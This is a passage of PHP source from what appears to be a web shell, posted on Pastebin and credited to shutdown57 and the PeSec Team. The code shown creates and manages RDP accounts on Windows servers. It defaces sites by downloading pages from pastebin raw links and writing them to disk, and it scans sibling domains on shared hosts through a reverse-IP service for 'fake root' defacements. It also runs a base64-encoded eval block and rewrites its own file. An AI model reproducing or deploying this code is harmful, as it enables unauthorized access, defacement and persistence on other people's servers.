  1702.                 }
  1703.             } else {
  1704.                 //
  1705.             }
  1706.         } else {
  1707.             echo "-- Create RDP --<br>
  1708.             <form method='post'>
  1709.             <table class='w3-table w3-striped'><tr><td>Username:</td><td>
  1710.             <input type='text' name='user' placeholder='username' value='achan' class='w3-input' requiindigo></td></tr><tr><td>Password:</td><td>
  1711.             <input type='text' name='pass' placeholder='password' value='achan' class='w3-input' requiindigo></td></tr><tr><td colspan='2'>
  1712.             <input type='submit' name='create' value='Go!' class='w3-btn w3-btn-block w3-indigo'></td></tr></table>
  1713.             </form>
  1714.             -- Option --<br>
  1715.             <form method='post'>
  1716.             <table class='w3-table w3-striped'><tr><td>Username:</td><td>
  1717.             <input type='text' name='r_user' placeholder='username' class='w3-input'  requiindigo></td></tr><tr><td>Options:</td><td>
  1718.             <select name='opsi' class='w3-input'>
  1719.             <option value='1'>Check Username</option>
  1720.             <option value='2'>Change Password</option>
  1721.             <option value='3'>Delete Username</option>
  1722.             </select></td></tr><tr><td colspan='2'>
  1723.             <input type='submit' name='s_opsi' value='Go!' class='w3-btn w3-btn-block w3-indigo'></td></tr></table>
  1724.             </form>
  1725.             ";
  1726.         }
  1727.     }else{
  1728.         echo "<div class='w3-indigo w3-panel'><h3>This Tools Just Support in Windows Server.</h3></div>";
  1729.     }
  1730.    
  1731. }elseif ($_GET['a']=='wos') {
  1732.     echo "
  1733.     <div class='w3-container w3-center'>
  1734.     <h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'>WithOutShadow Priv8 Script Deface</h3>
  1735.     <form method='post'>filename : <input type='text' name='wos' value='".$_GET['i']."/wos.html' class='w3-input'><input type='submit' value='deface!' class='w3-btn w3-indigo'></form>";
  1736.     if(isset($_POST['wos'])){
  1737.         $fp=fopen($_POST['wos'],"w");
  1738.         $isi=file_get_contents('http://pastebin.com/raw/0Fm2SLTp');
  1739.         if(fwrite($fp,$isi)){
  1740.             echo "<script>
  1741.             alert('defaced!');
  1742.             </script>";
  1743.         }
  1744.         fclose($fp);
  1745.     }
  1746. }elseif ($_GET['a']=='ps') {
  1747.     echo "
  1748.     <div class='w3-container w3-center'>
  1749.     <h3 class='w3-indigo w3-text-white w3-text-shadow w3-center'>PeSeC Priv8 Script Deface</h3>
  1750.     <form method='post'>filename : <input type='text' name='ps' value='".$_GET['i']."/PeSeC.html' class='w3-input'><input type='submit' value='deface!' class='w3-btn w3-indigo'></form>";
  1751.     if(isset($_POST['ps'])){
  1752.         $fp=fopen($_POST['ps'],"w");
  1753.         $isi=file_get_contents('http://pastebin.com/raw/SDHE0W4T');
  1754.         if(fwrite($fp,$isi)){
  1755.             echo "<script>
  1756.             alert('defaced!');
  1757.             </script>";
  1758.         }
  1759.         fclose($fp);
  1760.     }
  1761. }elseif ($_GET['a']=='fr') {
  1762.     ob_start();
  1763.     function reverse($url) {
  1764.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1765.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1766.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  1767.               curl_setopt($ch, CURLOPT_HEADER, 0);
  1768.               curl_setopt($ch, CURLOPT_POST, 1);
  1769.         $resp = curl_exec($ch);
  1770.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1771.         $array = explode(",,", $resp);
  1772.         unset($array[0]);
  1773.         foreach($array as $lnk) {
  1774.             $lnk = "http://$lnk";
  1775.             $lnk = str_replace(",", "", $lnk);
  1776.             echo $lnk."\n";
  1777.             ob_flush();
  1778.             flush();
  1779.         }
  1780.               curl_close($ch);
  1781.     }
  1782.     function cek($url) {
  1783.         $ch = curl_init($url);
  1784.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1785.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1786.         $resp = curl_exec($ch);
  1787.         return $resp;
  1788.     }
  1789.     $cwd = getcwd();
  1790.     $ambil_user = explode("/", $cwd);
  1791.     $user = $ambil_user[2];
  1792.     if($_POST['reverse']) {
  1793.         $site = explode("\r\n", $_POST['url']);
  1794.         $file = $_POST['file'];
  1795.         foreach($site as $url) {
  1796.             $cek = cek("$url/~$user/$file");
  1797.             if(preg_match("/hacked/", $cek)) {
  1798.                 echo "<center> URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=indigo>Fake Root!</font><br>";
  1799.             }
  1800.         }
  1801.     } else {
  1802.         echo "<div class='w3-container w3-center'>
  1803.         <h3 class='w3-indigo w3-text-shadow w3-text-white'>Fake Root</h3>
  1804.         <small>By : indoXploit </small>
  1805.         <form method='post'>
  1806.         Filename: <br><input type='text' name='file' value='deface.html' class='w3-input'><br>
  1807.         User: <br><input type='text' value='$user'  class='w3-input' readonly><br>
  1808.         Domain: <br>
  1809.         <textarea style='width:70%;height:400px;' name='url' class='w3-indigo w3-code'>";
  1810.         reverse($_SERVER['HTTP_HOST']);
  1811.         echo "</textarea><br>
  1812.         <input type='submit' name='reverse' value='Scan Fake Root!' class='w3-btn w3-indigo '>
  1813.         </form>
  1814.         </div>";
  1815.     }
  1816. }elseif ($_GET['a']=='themes') {
  1817.     $i=$_GET['i'];
  1818.     $c=$_GET['col'];
  1819.     if(empty($c)){
  1820.         // ini bukan log atau semacamnya kok, ini cuma html doang -_-" kalo gk percaya decode aja.
  1821.         // alesan di encode biar waktu ganti tema ini gak ikut ke ganti.
  1822.     @eval(base64_decode("ZWNobyAiPGRpdiBjbGFzcz0ndzMtY29udGFpbmVyIHczLWNlbnRlcic+DQoJCTxoMyBjbGFzcz0ndzMtcmVkIHczLXRleHQtc2hhZG93IHczLXRleHQtd2hpdGUnPkdsb2JhbCBDb2xvcjwvaDM+IjsNCgllY2hvJyA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1ob3ZlciI+DQogIDxhIGNsYXNzPSJ3My1yZWQgdzMtYnRuIiBzdHlsZT0id2lkdGg6MzAwcHg7Ij5TRUxFQ1QgVEhFTUVTPC9hPg0KICA8ZGl2IGNsYXNzPSJ3My1kcm9wZG93bi1jb250ZW50IHczLWJvcmRlciIgc3R5bGU9IndpZHRoOjMwMHB4OyI+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1yZWQiICBjbGFzcz0idzMtcmVkIj5SRUQ8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1waW5rIiAgY2xhc3M9InczLXBpbmsiPlBJTks8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1vcmFuZ2UiIGNsYXNzPSJ3My1vcmFuZ2UiPk9SQU5HRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD15ZWxsb3ciICBjbGFzcz0idzMteWVsbG93Ij5ZRUxMT1c8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ncmVlbiIgIGNsYXNzPSJ3My1ncmVlbiI+R1JFRU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD10ZWFsIiBjbGFzcz0idzMtdGVhbCI+VEVBTDwvYT4NCiAgICAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1jeWFuIiAgY2xhc3M9InczLWN5YW4iPkNZQU48L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1saW1lIiAgY2xhc3M9InczLWxpbWUiPkxJTUU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1ibHVlIiBjbGFzcz0idzMtYmx1ZSI+QkxVRTwvYT4NCiAgICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1pbmRpZ28iICBjbGFzcz0idzMtaW5kaWdvIj5JTkRJR088L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1wdXJwbGUiICBjbGFzcz0idzMtcHVycGxlIj5QVVJQTEU8L2E+DQogICAgPGEgaHJlZj0iP2E9dGhlbWVzJmk9Jy4kaS4nJmNvbD1raGFraSIgY2xhc3M9InczLWtoYWtpIj5LSEFLSTwvYT4NCiAgPC9kaXY+DQo8L2Rpdj4gJzs="));
  1823. }else{
  1824. $fn=str_replace("/","",$_SERVER['SCRIPT_NAME']);
  1825. $gc=file_get_contents($fn);
  1826. $co=str_replace("indigo",$c,$gc);
  1827. $fp=fopen($fn,"w");
  1828. if(fwrite($fp, $co)){
  1829.     echo "<meta http-equiv='refresh' content=0;url='?'>";
  1830. }else{
  1831.     echo "gagal";
  1832. }
  1833. fclose($fp);
  1834. }
  1835. }elseif ($_GET['a']=='pass') {
  1836. function a_gantipass($old,$new){
  1837.     $file=str_replace("/","",$_SERVER['SCRIPT_NAME']);
  1838.     $getc=file_get_contents($file);
  1839.     $pw=str_replace("".$old."","".$new."",$getc);
  1840.     $fp=fopen($file,"w");
  1841.     return fwrite($fp,$pw);
  1842.     fclose($fp);
  1843.  
  1844. }
  1845. echo "<div class='w3-center w3-container'><h3 class='w3-indigo w3-text-shadow'>Change Password</h3>";
  1846. echo "<form method='post'>";
  1847. echo "<table class='w3-table w3-border'><tr><td>Old password:</td><td><input type='text' name='op' class='w3-input'></td></tr>";
  1848. echo"<tr><td>New password:</td><td><input type='text' name='np' class='w3-input'></td></tr>";
  1849. echo"<tr><td colspan='2'><input type='submit' name='sbmt' class='w3-btn w3-btn-block w3-indigo' value='Change'></td></tr></table></form>";
  1850. if(isset($_POST['sbmt'])){
  1851.     $plama=md5($_POST['op']);
  1852.     $pbaru=md5($_POST['np']);
  1853.     if(a_gantipass($plama,$pbaru)){
  1854.         echo "<script>alert('passwordberhasil di ubah!')</script>";
  1855.         return session_destroy();
  1856.     }
  1857. }
  1858. }
  1859. }
  1860. $end_html_a ="<br><br><br><br>";
  1861. $end_html_a.='<footer class="w3-panel w3-indigo w3-text-shadow w3-text-white w3-center" style="font-size:12px;">copyright &copy; '.date('Y').' PeSec Team | PoweRed by : <a href="http://linuxcode.org" target="_blank">LinuxCode.org</a> | Ayana Shahab priv8 shell By : <a href="https://facebook.com/JKT48.co" >shutdown57</a></footer>';
  1862. $end_html_a.='</body></html>';
  1863. echo $end_html_a;
  1864. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top